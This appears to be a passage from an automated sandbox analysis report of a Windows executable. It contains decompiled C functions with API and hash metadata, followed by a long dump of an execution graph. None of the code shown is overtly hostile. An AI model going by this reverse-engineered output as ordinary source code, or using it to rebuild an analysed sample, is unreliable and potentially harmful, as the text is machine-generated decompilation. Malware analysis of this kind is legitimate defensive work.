                                                    						if(_a8 == 0x7d || E00CE3E13( &_a8) + _t41 > 0x3fffb) {
                                                    							break;
                                                    						} else {
                                                    							E00CE7686(_t42,  &_a8);
                                                    							_t41 = E00CE3E13(_t42);
                                                    							_t44 = _t44 + 0xc;
                                                    							if(_t41 == 0) {
                                                    								L11:
                                                    								if(_a7 == 0) {
                                                    									E00CE6066(_t42 + _t41 * 2, L"\r\n");
                                                    								}
                                                    								continue;
                                                    							}
                                                    							_t6 = _t41 - 1; // -1
                                                    							_t31 = _t42 + _t6 * 2;
                                                    							while( *_t31 == 0x20) {
                                                    								_t31 = _t31 - 2;
                                                    								_t41 = _t41 - 1;
                                                    								if(_t41 != 0) {
                                                    									continue;
                                                    								}
                                                    								goto L11;
                                                    							}
                                                    							goto L11;
                                                    						}
                                                    					} else {
                                                    						continue;
                                                    					}
                                                    				}
                                                    				return _t42;
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: }
                                                    • API String ID: 176396367-4239843852
                                                    • Opcode ID: e91a140f377e248cfa273693019b1615bbfe44b74e51b5f4fc16efa5ac700dfe
                                                    • Instruction ID: df0fc782a0b8b11589a5078f27756ba98f7192f771efef5ce8a5a7891151139a
                                                    • Opcode Fuzzy Hash: e91a140f377e248cfa273693019b1615bbfe44b74e51b5f4fc16efa5ac700dfe
                                                    • Instruction Fuzzy Hash: BE21D17290434A9AD731EA64E845F6BB3ECDF91750F02042BF744C3341FB64AE4893A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00CCF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CCF2E4
                                                      • Part of subcall function 00CCF2C5: GetProcAddress.KERNEL32(00D081C8,CryptUnprotectMemory), ref: 00CCF2F4
                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00CCF33E), ref: 00CCF3D2
                                                    Strings
                                                    • CryptUnprotectMemory failed, xrefs: 00CCF3CA
                                                    • CryptProtectMemory failed, xrefs: 00CCF389
                                                    Similarity
                                                    • API ID: AddressProc$CurrentProcess
                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                    • API String ID: 2190909847-396321323
                                                    • Opcode ID: 9d1424ed65a9287886031d2844d048ab17e6da6c2e4c280525131c4bed5597e6
                                                    • Instruction ID: 4b7cefbfa6cd8862c78db8bc376378448b77ab4cb029b99b7040708834df9d70
                                                    • Opcode Fuzzy Hash: 9d1424ed65a9287886031d2844d048ab17e6da6c2e4c280525131c4bed5597e6
                                                    • Instruction Fuzzy Hash: A3110331A007A9BBEF119B21DC45F6E3B56FF04720B08416EFC559B2A1DA709E0296A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 77%
                                                    			E00CCB991(void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
                                                    				short _t10;
                                                    				short _t13;
                                                    				signed int _t14;
                                                    				short* _t19;
                                                    				signed int _t20;
                                                    				void* _t22;
                                                    				signed short* _t26;
                                                    				signed int _t28;
                                                    				signed int _t30;
                                                    
                                                    				_t19 = _a8;
                                                    				_t26 = _a4;
                                                    				 *_t19 = 0;
                                                    				_t10 = E00CCBC98(__eflags, _t26);
                                                    				_t20 =  *_t26 & 0x0000ffff;
                                                    				if(_t10 != 0) {
                                                    					return E00CC4092(_t19, _a12, L"%c:\\", _t20);
                                                    				}
                                                    				_t28 = 0x5c;
                                                    				__eflags = _t20 - _t28;
                                                    				if(_t20 == _t28) {
                                                    					__eflags = _t26[1] - _t28;
                                                    					if(_t26[1] == _t28) {
                                                    						_push(_t28);
                                                    						_push( &(_t26[2]));
                                                    						_t10 = E00CE22C6(_t20);
                                                    						_pop(_t22);
                                                    						__eflags = _t10;
                                                    						if(_t10 != 0) {
                                                    							_push(_t28);
                                                    							_push(_t10 + 2);
                                                    							_t13 = E00CE22C6(_t22);
                                                    							__eflags = _t13;
                                                    							if(_t13 == 0) {
                                                    								_t14 = E00CE3E13(_t26);
                                                    							} else {
                                                    								_t14 = (_t13 - _t26 >> 1) + 1;
                                                    							}
                                                    							__eflags = _t14 - _a12;
                                                    							asm("sbb esi, esi");
                                                    							_t30 = _t28 & _t14;
                                                    							E00CE60C2(_t19, _t26, _t30);
                                                    							_t10 = 0;
                                                    							__eflags = 0;
                                                    							 *((short*)(_t19 + _t30 * 2)) = 0;
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t10;
                                                    			}













                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CCB9B8
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                    Strings
                                                    Similarity
                                                    • API ID: __vswprintf_c_l_swprintf
                                                    • String ID: %c:\
                                                    • API String ID: 1543624204-3142399695
                                                    • Opcode ID: 1f384847ff4158b2f6d5ef2529ced423239fa872b89054c302a5b1ee0b778420
                                                    • Instruction ID: 2d5fc86bec372f8e1035436abe26daaed0fdf2f36071d77ff3a511c646feda25
                                                    • Opcode Fuzzy Hash: 1f384847ff4158b2f6d5ef2529ced423239fa872b89054c302a5b1ee0b778420
                                                    • Instruction Fuzzy Hash: B501D263500351A99A346BA6CC87E6BA7ACEE91770F40841EF599D7082EB30DD4092B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E00CC1316(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
                                                    				struct HWND__* _t20;
                                                    				struct HWND__* _t21;
                                                    
                                                    				if(_a8 == 0x30) {
                                                    					E00CCE2C1(0xd01030, _a4);
                                                    				} else {
                                                    					_t27 = _a8 - 0x110;
                                                    					if(_a8 == 0x110) {
                                                    						E00CCE2E8(0xd01030, __edx, _t27, _a4, _a20, _a28 & 1);
                                                    						if((_a28 & 0x00000001) != 0) {
                                                    							_t20 =  *0xd23154(_a4);
                                                    							if(_t20 != 0) {
                                                    								_t21 = GetDlgItem(_t20, 0x3021);
                                                    								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
                                                    									SetWindowTextW(_t21, 0xcf35f4);
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return 0;
                                                    			}






                                                    APIs
                                                      • Part of subcall function 00CCE2E8: _swprintf.LIBCMT ref: 00CCE30E
                                                      • Part of subcall function 00CCE2E8: _strlen.LIBCMT ref: 00CCE32F
                                                      • Part of subcall function 00CCE2E8: SetDlgItemTextW.USER32(?,00CFE274,?), ref: 00CCE38F
                                                      • Part of subcall function 00CCE2E8: GetWindowRect.USER32(?,?), ref: 00CCE3C9
                                                      • Part of subcall function 00CCE2E8: GetClientRect.USER32(?,?), ref: 00CCE3D5
                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                    • SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    Strings
                                                    Similarity
                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                    • String ID: 0
                                                    • API String ID: 2622349952-4108050209
                                                    • Opcode ID: 990c745072dca72b95a93738aaf295821ba32ff4f9284bcedaf9730c4244089e
                                                    • Instruction ID: 968b01009f00042b7a95640bf549a54c323b3d9b6307ea98a4ba58ea4b1fa4d0
                                                    • Opcode Fuzzy Hash: 990c745072dca72b95a93738aaf295821ba32ff4f9284bcedaf9730c4244089e
                                                    • Instruction Fuzzy Hash: C9F036301043C8A6EF155F51CC0DFA93B599B5634DF0C4119FD58955A2C778CA91AA70
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E00CD0FE4(void* __ecx, void* __ebp, void* _a4) {
                                                    				void* __esi;
                                                    				long _t2;
                                                    				void* _t6;
                                                    
                                                    				_t6 = __ecx;
                                                    				_t2 = WaitForSingleObject(_a4, 0xffffffff);
                                                    				if(_t2 == 0xffffffff) {
                                                    					_push(GetLastError());
                                                    					return E00CC6C31(E00CC6C36(_t6, 0xd01098, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xd01098, 0xd01098, 2);
                                                    				}
                                                    				return _t2;
                                                    			}







                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00CD1101,?,?,00CD117F,?,?,?,?,?,00CD1169), ref: 00CD0FEA
                                                    • GetLastError.KERNEL32(?,?,00CD117F,?,?,?,?,?,00CD1169), ref: 00CD0FF6
                                                      • Part of subcall function 00CC6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC6C54
                                                    Strings
                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CD0FFF
                                                    Similarity
                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                    • API String ID: 1091760877-2248577382
                                                    • Opcode ID: fd82b67be3cdf88037946b231c7a7ed26e77ed54634602aceb57bcfce9386712
                                                    • Instruction ID: a54e194efadc6537bb13b07daf504ea169e1568b874fa844cf7a1086cc1482b8
                                                    • Opcode Fuzzy Hash: fd82b67be3cdf88037946b231c7a7ed26e77ed54634602aceb57bcfce9386712
                                                    • Instruction Fuzzy Hash: 16D05B7150456477C6103324AD05FBF39049B12731B54472AF579552F5CE154AC19697
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CCE29E(void* __ecx) {
                                                    				struct HRSRC__* _t3;
                                                    				void* _t5;
                                                    
                                                    				_t5 = __ecx;
                                                    				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
                                                    				if(_t3 != 0) {
                                                    					 *((char*)(_t5 + 0x64)) = 1;
                                                    					return _t3;
                                                    				}
                                                    				return _t3;
                                                    			}






                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00CCDA55,?), ref: 00CCE2A3
                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CCDA55,?), ref: 00CCE2B1
                                                    Strings
                                                    Similarity
                                                    • API ID: FindHandleModuleResource
                                                    • String ID: RTL
                                                    • API String ID: 3537982541-834975271
                                                    • Opcode ID: d3ca4dd5ae9be58e76d1d46c887f0b4bce81126f49671a338c665db369724f27
                                                    • Instruction ID: 66bd738cbe5644ada963358f16c51e3f6c7f2713c914d702ae9c4e772cd5cf5c
                                                    • Opcode Fuzzy Hash: d3ca4dd5ae9be58e76d1d46c887f0b4bce81126f49671a338c665db369724f27
                                                    • Instruction Fuzzy Hash: 34C0803124079076E73037757C0DF576E585B01B11F05045DF641E91D1DEE5C540C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:4.3%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:1.2%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:54
330170 ___std_exception_copy 94687->94688 94689 33018a 94688->94689 94692 33018c 94688->94692 94712 33523d 7 API calls 2 library calls 94688->94712 94689->94667 94691 3309fd 94714 333634 RaiseException 94691->94714 94692->94691 94713 333634 RaiseException 94692->94713 94695 330a1a 94695->94667 94697 33016b ___std_exception_copy 94696->94697 94698 33018a 94697->94698 94701 33018c 94697->94701 94715 33523d 7 API calls 2 library calls 94697->94715 94698->94669 94700 3309fd 94717 333634 RaiseException 94700->94717 94701->94700 94716 333634 RaiseException 94701->94716 94704 330a1a 94704->94669 94705->94669 94706->94672 94707->94672 94708->94672 94709->94648 94710->94650 94711->94685 94712->94688 94713->94691 94714->94695 94715->94697 94716->94700 94717->94704 94719 31be90 __fread_nolock 94718->94719 94720 31be81 94718->94720 94719->94529 94720->94719 94721 33019b 8 API calls 94720->94721 94721->94719 94723 31bdcc 94722->94723 94724 31bdfb 94723->94724 94740 31bf39 94723->94740 94724->94529 94726->94529 94727->94516 94729 33019b 8 API calls 94728->94729 94730 31bf1c 94729->94730 94731 33016b 8 API calls 94730->94731 94732 31bf2a 94731->94732 94733 330433 29 API calls __onexit 94732->94733 94733->94523 94734->94529 94735->94529 94736->94529 94737->94529 94738->94529 94739->94529 94757 31cf30 94740->94757 94742 31bf49 94743 31bf57 94742->94743 94744 360d59 94742->94744 94746 33016b 8 API calls 94743->94746 94766 31b3fe 94744->94766 94748 31bf68 94746->94748 94747 360d64 94749 31bf07 8 API calls 94748->94749 94750 31bf72 94749->94750 94751 31bf81 94750->94751 94752 31be6d 8 API calls 94750->94752 94753 33016b 8 API calls 94751->94753 94752->94751 94754 31bf8b 94753->94754 94765 31be0f 39 API calls 94754->94765 94756 31bfaf 94756->94724 94758 31d177 94757->94758 94763 31cf43 94757->94763 94758->94742 94760 31bf07 8 API calls 94760->94763 94761 31cfed 94761->94742 94763->94760 94763->94761 94770 3305d2 5 API calls __Init_thread_wait 94763->94770 94771 330433 29 API calls 
__onexit 94763->94771 94772 330588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94763->94772 94765->94756 94767 31b40c 94766->94767 94769 31b412 94766->94769 94768 31be6d 8 API calls 94767->94768 94767->94769 94768->94769 94769->94747 94770->94763 94771->94763 94772->94763 94774 323121 94773->94774 94778 3230fd 94773->94778 95140 3305d2 5 API calls __Init_thread_wait 94774->95140 94776 32312b 94776->94778 95141 330588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94776->95141 94782 322b60 94778->94782 95142 3305d2 5 API calls __Init_thread_wait 94778->95142 94779 329ec7 94779->94782 95143 330588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94779->95143 94782->94547 95144 31c92d 94783->95144 94785 32f972 94786 36fac0 Sleep 94785->94786 94787 32f97a timeGetTime 94785->94787 94788 31c92d 39 API calls 94787->94788 94789 32f990 94788->94789 94789->94578 94791 31b3fe 8 API calls 94790->94791 94792 38de70 94791->94792 95150 38183b 94792->95150 94794 38de78 94794->94578 94799 39a4c7 94795->94799 94800 39a4d6 94799->94800 95175 318e70 94799->95175 94800->94578 94802 318e70 56 API calls 94801->94802 94803 384ae8 94802->94803 95252 37da81 94803->95252 94805 384af0 94805->94578 94807 317953 FindCloseChangeNotification 94806->94807 94808 31792b 94807->94808 94809 317953 FindCloseChangeNotification 94808->94809 94810 31793a messages 94809->94810 94810->94578 94812 385fbd 94811->94812 94813 385ef4 94811->94813 94815 318e70 56 API calls 94812->94815 94825 386011 94812->94825 94814 31c92d 39 API calls 94813->94814 94816 385eff 94814->94816 94818 385fef 94815->94818 94817 31c92d 39 API calls 94816->94817 94819 385f15 94817->94819 94820 318e70 56 API calls 94818->94820 94819->94812 94822 31bf07 8 API calls 94819->94822 94821 386001 94820->94821 95272 37d836 94821->95272 94824 385f26 94822->94824 94826 31bf07 8 API calls 94824->94826 94825->94578 94827 385f2f 94826->94827 94828 318e70 56 API calls 94827->94828 94829 385f3c 94828->94829 
95314 31694e 94829->95314 94842 318e70 56 API calls 94841->94842 94843 386d47 94842->94843 94844 386d84 94843->94844 94845 31c92d 39 API calls 94843->94845 95481 37e783 94844->95481 94847 386d76 94845->94847 94847->94844 94849 31557e 9 API calls 94847->94849 94848 386d92 95486 317a59 94848->95486 94849->94844 94852 318e70 56 API calls 94852->94848 94853 386dd7 94853->94578 94855 31bf07 8 API calls 94854->94855 94856 388e4a 94855->94856 94857 33019b 8 API calls 94856->94857 94858 388e54 94857->94858 95492 3141a6 94858->95492 94861 318e70 56 API calls 94862 388e6d 94861->94862 94863 31557e 9 API calls 94862->94863 94864 388e78 94863->94864 94865 318e70 56 API calls 94864->94865 94866 388e85 94865->94866 94867 318e70 56 API calls 94866->94867 94868 388e97 94867->94868 94869 318e70 56 API calls 94868->94869 94870 388eac GetPrivateProfileStringW 94869->94870 95495 316ab6 94870->95495 94872 388ecf messages 94872->94578 94874 31795d 94873->94874 94875 31796c 94873->94875 94874->94578 94875->94874 94876 317971 FindCloseChangeNotification 94875->94876 94876->94874 94878 38875a __wsopen_s 94877->94878 94879 318e70 56 API calls 94878->94879 94880 38877b 94879->94880 94881 31c92d 39 API calls 94880->94881 94887 388799 94880->94887 94881->94887 94882 318e70 56 API calls 94883 38887c 94882->94883 94884 31557e 9 API calls 94883->94884 94885 3888a7 94884->94885 95509 33d913 94885->95509 94887->94882 94896 388973 94887->94896 94888 3888cd 94889 3888f7 GetCurrentDirectoryW SetCurrentDirectoryW 94888->94889 94890 388921 94889->94890 94889->94896 94891 37e387 4 API calls 94890->94891 94892 38892a 94891->94892 94893 37e9c5 GetFileAttributesW 94892->94893 94892->94896 94894 388938 94893->94894 94895 388940 GetFileAttributesW SetFileAttributesW 94894->94895 94901 3889cb 94894->94901 94897 388969 SetCurrentDirectoryW 94895->94897 94898 3889b1 94895->94898 94896->94578 94897->94896 94899 388a02 SetCurrentDirectoryW 94898->94899 94900 3889b5 SetCurrentDirectoryW 94898->94900 94899->94896 
94900->94901 94901->94899 94903 316ab6 8 API calls 94902->94903 94904 32be8d 94903->94904 94905 33016b 8 API calls 94904->94905 94909 368f7a 94904->94909 94907 32bea6 94905->94907 94908 33019b 8 API calls 94907->94908 94910 32beb7 94908->94910 94954 32bf1f 94909->94954 95593 38a607 39 API calls 94909->95593 94911 317953 FindCloseChangeNotification 94910->94911 94912 32bec2 94911->94912 94914 31bf07 8 API calls 94912->94914 94913 31c92d 39 API calls 94915 368fdc 94913->94915 94916 32beca 94914->94916 94917 368fe4 94915->94917 94918 32bf2c 94915->94918 94919 317953 FindCloseChangeNotification 94916->94919 94921 31c92d 39 API calls 94917->94921 95564 32fdc9 94918->95564 94922 32bed1 94919->94922 94926 32bf33 94921->94926 94923 318e70 56 API calls 94922->94923 94924 32bedd 94923->94924 94925 317953 FindCloseChangeNotification 94924->94925 94927 32bee7 94925->94927 94928 32bf4e 94926->94928 94929 368ff9 94926->94929 95542 316e52 94927->95542 95569 317a14 94928->95569 94930 33019b 8 API calls 94929->94930 94934 368ffe 94930->94934 94939 369012 94934->94939 95594 3141c9 94934->95594 94936 32bf00 95549 316b12 94936->95549 94937 368f72 94943 317923 FindCloseChangeNotification 94937->94943 94947 369016 __fread_nolock 94939->94947 95597 381759 94939->95597 94940 32bf65 94945 317a59 8 API calls 94940->94945 94940->94947 94943->94909 94949 32bf79 94945->94949 94946 32bf0e 95588 316afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 94946->95588 94950 32bfb3 94949->94950 94951 317953 FindCloseChangeNotification 94949->94951 94950->94578 94953 32bfa7 94951->94953 94953->94950 94956 317923 FindCloseChangeNotification 94953->94956 94954->94913 94954->94918 94955 32bf15 94955->94954 95589 37d4bf 94955->95589 94956->94950 95669 38a240 94957->95669 94959 388d44 94959->94578 94961 318e70 56 API calls 94960->94961 94962 3865c7 94961->94962 94963 37e387 4 API calls 94962->94963 94964 3865d1 94963->94964 94964->94578 95750 3988b6 94965->95750 94967 399efa 94967->94578 94969 31bf07 8 
API calls 94968->94969 94970 389607 94969->94970 94971 318e70 56 API calls 94970->94971 94972 389616 94971->94972 94973 31557e 9 API calls 94972->94973 94974 389621 94973->94974 94975 318e70 56 API calls 94974->94975 94976 38962e 94975->94976 94977 318e70 56 API calls 94976->94977 94978 389640 94977->94978 94979 318e70 56 API calls 94978->94979 94980 389655 WritePrivateProfileStringW 94979->94980 94981 38966b WritePrivateProfileStringW 94980->94981 94982 389677 94980->94982 94981->94982 94982->94578 94984 31bf07 8 API calls 94983->94984 94985 39cd39 94984->94985 94986 31bf07 8 API calls 94985->94986 94987 39cd42 94986->94987 94988 31bf07 8 API calls 94987->94988 94989 39cd4b 94988->94989 94990 318e70 56 API calls 94989->94990 94999 39cdda 94989->94999 94991 39cd71 94990->94991 95882 39d6b1 94991->95882 94993 39cda5 95908 39d2f7 94993->95908 94999->94578 95071 39a90a 95070->95071 95072 39a8ca 95070->95072 95073 39a928 95071->95073 95075 31c92d 39 API calls 95071->95075 95072->94578 95073->95072 95074 31c92d 39 API calls 95073->95074 95076 39a990 95073->95076 95074->95076 95075->95073 95932 380287 95076->95932 95080 39a607 95078->95080 95085 39a5c7 95078->95085 95079 39a625 95082 31c92d 39 API calls 95079->95082 95083 39a682 95079->95083 95079->95085 95080->95079 95081 31c92d 39 API calls 95080->95081 95081->95079 95082->95083 95084 380287 62 API calls 95083->95084 95084->95085 95085->94578 95087 31bf07 8 API calls 95086->95087 95088 39eb7a 95087->95088 95089 318e70 56 API calls 95088->95089 95090 39eb89 95089->95090 95091 317a14 8 API calls 95090->95091 95092 39eb9c 95091->95092 95093 318e70 56 API calls 95092->95093 95094 39eba9 95093->95094 95095 39ebc1 95094->95095 95096 39ec26 95094->95096 95098 31c92d 39 API calls 95095->95098 95097 318e70 56 API calls 95096->95097 95100 39ec2b 95097->95100 95099 39ebc6 95098->95099 95101 39ec38 95099->95101 95103 39ebdf 95099->95103 95100->95101 95102 39ec73 95100->95102 95105 316ab6 8 API calls 95101->95105 95104 39ec8b 
95102->95104 95107 31c92d 39 API calls 95102->95107 95106 318685 8 API calls 95103->95106 95108 39eca4 95104->95108 95111 31c92d 39 API calls 95104->95111 95118 39ec45 95105->95118 95110 39ebec 95106->95110 95107->95104 95109 31be6d 8 API calls 95108->95109 95112 39ecbe 95109->95112 95113 317af4 8 API calls 95110->95113 95111->95108 95965 379b57 95112->95965 95115 39ebfa 95113->95115 95116 318685 8 API calls 95115->95116 95117 39ec13 95116->95117 95120 317af4 8 API calls 95117->95120 95118->94578 95119 39ec21 95121 317a59 8 API calls 95119->95121 95120->95119 95121->95118 95123 37e9d1 95122->95123 95123->94578 95124->94541 95126 31b26e _wcslen 95125->95126 95127 33019b 8 API calls 95126->95127 95128 31b296 __fread_nolock 95127->95128 95129 33016b 8 API calls 95128->95129 95130 31b2ac 95129->95130 95130->94554 95131->94544 95132->94567 95133->94567 95134->94543 95135->94579 95136->94579 95137->94579 95138->94576 95139->94579 95140->94776 95141->94778 95142->94779 95143->94782 95145 31c93e 95144->95145 95146 31c945 95144->95146 95145->95146 95149 336661 39 API calls _strftime 95145->95149 95146->94785 95148 31c988 95148->94785 95149->95148 95151 381852 95150->95151 95167 38196b 95150->95167 95152 38189f 95151->95152 95153 381872 95151->95153 95155 3818b6 95151->95155 95154 33019b 8 API calls 95152->95154 95153->95152 95157 381886 95153->95157 95161 381894 __fread_nolock 95154->95161 95158 33019b 8 API calls 95155->95158 95165 3818d3 95155->95165 95156 3818fa 95160 33019b 8 API calls 95156->95160 95159 33019b 8 API calls 95157->95159 95158->95165 95159->95161 95162 381900 95160->95162 95163 33016b 8 API calls 95161->95163 95169 32c1f1 95162->95169 95163->95167 95165->95156 95165->95157 95165->95161 95167->94794 95170 33019b 8 API calls 95169->95170 95171 32c208 95170->95171 95172 33016b 8 API calls 95171->95172 95173 32c214 95172->95173 95174 32f9e2 10 API calls 95173->95174 95174->95161 95176 318e85 95175->95176 95192 318e82 95175->95192 95177 318ebb 95176->95177 
95178 318e8d 95176->95178 95180 318ecd 95177->95180 95185 356a29 95177->95185 95188 356b10 95177->95188 95204 335556 26 API calls 95178->95204 95205 32fe8f 54 API calls 95180->95205 95183 356b28 95183->95183 95184 318e9d 95187 33016b 8 API calls 95184->95187 95191 33019b 8 API calls 95185->95191 95197 356aa2 95185->95197 95189 318ea7 95187->95189 95207 335513 27 API calls 95188->95207 95190 31b25f 8 API calls 95189->95190 95190->95192 95194 356a72 95191->95194 95198 3817be 95192->95198 95193 33016b 8 API calls 95195 356a99 95193->95195 95194->95193 95196 31b25f 8 API calls 95195->95196 95196->95197 95206 32fe8f 54 API calls 95197->95206 95199 3817cb 95198->95199 95200 33016b 8 API calls 95199->95200 95201 3817d2 95200->95201 95208 37fbca 95201->95208 95203 38180c 95203->94800 95204->95184 95205->95184 95206->95188 95207->95183 95226 31c269 95208->95226 95210 37fbdd CharLowerBuffW 95214 37fbf0 95210->95214 95211 31627c 8 API calls 95211->95214 95212 37fc2e 95213 37fc40 95212->95213 95247 31627c 95212->95247 95216 33019b 8 API calls 95213->95216 95214->95211 95214->95212 95225 37fbfa ___scrt_fastfail 95214->95225 95220 37fc6e 95216->95220 95219 37fccd 95222 33016b 8 API calls 95219->95222 95219->95225 95221 37fc90 95220->95221 95250 37fb02 8 API calls 95220->95250 95232 37fd21 95221->95232 95223 37fce7 95222->95223 95224 33019b 8 API calls 95223->95224 95224->95225 95225->95203 95227 31c279 __fread_nolock 95226->95227 95228 31c27c 95226->95228 95227->95210 95229 33016b 8 API calls 95228->95229 95230 31c287 95229->95230 95231 33019b 8 API calls 95230->95231 95231->95227 95233 31bf07 8 API calls 95232->95233 95234 37fd53 95233->95234 95235 31bf07 8 API calls 95234->95235 95236 37fd5c 95235->95236 95237 31bf07 8 API calls 95236->95237 95246 37fd65 95237->95246 95238 3184b7 8 API calls 95238->95246 95239 380029 95239->95219 95240 336718 GetStringTypeW 95240->95246 95242 336661 39 API calls 95242->95246 95243 37fd21 40 API calls 95243->95246 95244 31acc0 8 API calls 
95244->95246 95245 31be6d 8 API calls 95245->95246 95246->95238 95246->95239 95246->95240 95246->95242 95246->95243 95246->95244 95246->95245 95251 336742 GetStringTypeW _strftime 95246->95251 95248 31c269 8 API calls 95247->95248 95249 316287 95248->95249 95249->95213 95250->95220 95251->95246 95264 3179ed 95252->95264 95255 37daca GetLastError 95256 37dad7 CreateDirectoryW 95255->95256 95257 37dae5 95255->95257 95256->95257 95258 37dae3 95256->95258 95257->95258 95268 3196d9 95257->95268 95258->94805 95260 37db27 95261 37da81 8 API calls 95260->95261 95262 37db30 95261->95262 95262->95258 95263 37db34 CreateDirectoryW 95262->95263 95263->95258 95265 3179fb 95264->95265 95266 3196d9 8 API calls 95265->95266 95267 317a0f GetFileAttributesW 95266->95267 95267->95255 95267->95258 95269 3196f0 __fread_nolock 95268->95269 95270 3196e7 95268->95270 95269->95260 95270->95269 95271 31c269 8 API calls 95270->95271 95271->95269 95273 31bf07 8 API calls 95272->95273 95274 37d853 95273->95274 95275 31bf07 8 API calls 95274->95275 95276 37d85b 95275->95276 95277 31bf07 8 API calls 95276->95277 95278 37d863 95277->95278 95368 31557e 95278->95368 95281 31557e 9 API calls 95282 37d877 95281->95282 95378 37e958 95282->95378 95315 31bf07 8 API calls 95314->95315 95316 316964 95315->95316 95317 31bf07 8 API calls 95316->95317 95318 31696c 95317->95318 95319 31bf07 8 API calls 95318->95319 95320 316974 95319->95320 95321 31bf07 8 API calls 95320->95321 95322 31697c 95321->95322 95323 355725 95322->95323 95324 3169b0 95322->95324 95325 31be6d 8 API calls 95323->95325 95326 318685 8 API calls 95324->95326 95327 35572e 95325->95327 95328 3169be 95326->95328 95329 31bceb 8 API calls 95327->95329 95330 3196d9 8 API calls 95328->95330 95333 3169f3 95329->95333 95331 3169c8 95330->95331 95331->95333 95334 318685 8 API calls 95331->95334 95332 316a38 95443 318685 95332->95443 95333->95332 95335 316a14 95333->95335 95345 355750 95333->95345 95337 3169e9 95334->95337 95335->95332 95340 31627c 
8 API calls 95335->95340 95339 3196d9 8 API calls 95337->95339 95338 316a49 95341 316a5f 95338->95341 95346 31be6d 8 API calls 95338->95346 95339->95333 95343 316a21 95340->95343 95343->95332 95351 318685 8 API calls 95343->95351 95344 3184b7 8 API calls 95348 355810 95344->95348 95345->95344 95346->95341 95348->95332 95354 31627c 8 API calls 95348->95354 95456 31acc0 95348->95456 95351->95332 95354->95348 95404 3522f0 95368->95404 95371 3155c5 95418 31bceb 95371->95418 95372 3155aa 95406 3184b7 95372->95406 95375 3155b6 95376 3179ed 8 API calls 95375->95376 95377 3155c2 95376->95377 95377->95281 95379 31bf07 8 API calls 95378->95379 95380 37e96d 95379->95380 95381 31bf07 8 API calls 95380->95381 95382 37e975 95381->95382 95383 31694e 8 API calls 95382->95383 95384 37e984 95383->95384 95385 31694e 8 API calls 95384->95385 95386 37e994 95385->95386 95405 31558b GetFullPathNameW 95404->95405 95405->95371 95405->95372 95407 3184c7 _wcslen 95406->95407 95408 3565bb 95406->95408 95411 318502 95407->95411 95412 3184dd 95407->95412 95409 3196d9 8 API calls 95408->95409 95410 3565c4 95409->95410 95410->95410 95414 33016b 8 API calls 95411->95414 95424 318894 95412->95424 95416 31850e 95414->95416 95415 3184e5 __fread_nolock 95415->95375 95417 33019b 8 API calls 95416->95417 95417->95415 95419 31bd05 95418->95419 95420 31bcf8 95418->95420 95421 33016b 8 API calls 95419->95421 95420->95375 95422 31bd0f 95421->95422 95423 33019b 8 API calls 95422->95423 95423->95420 95425 3188a6 95424->95425 95426 3188ac 95424->95426 95425->95415 95427 33019b 8 API calls 95426->95427 95427->95425 95444 3186f1 95443->95444 95445 318694 95443->95445 95446 3196d9 8 API calls 95444->95446 95445->95444 95447 31869f 95445->95447 95453 3186c2 __fread_nolock 95446->95453 95448 3566b7 95447->95448 95449 3186ba 95447->95449 95450 33016b 8 API calls 95448->95450 95451 318894 8 API calls 95449->95451 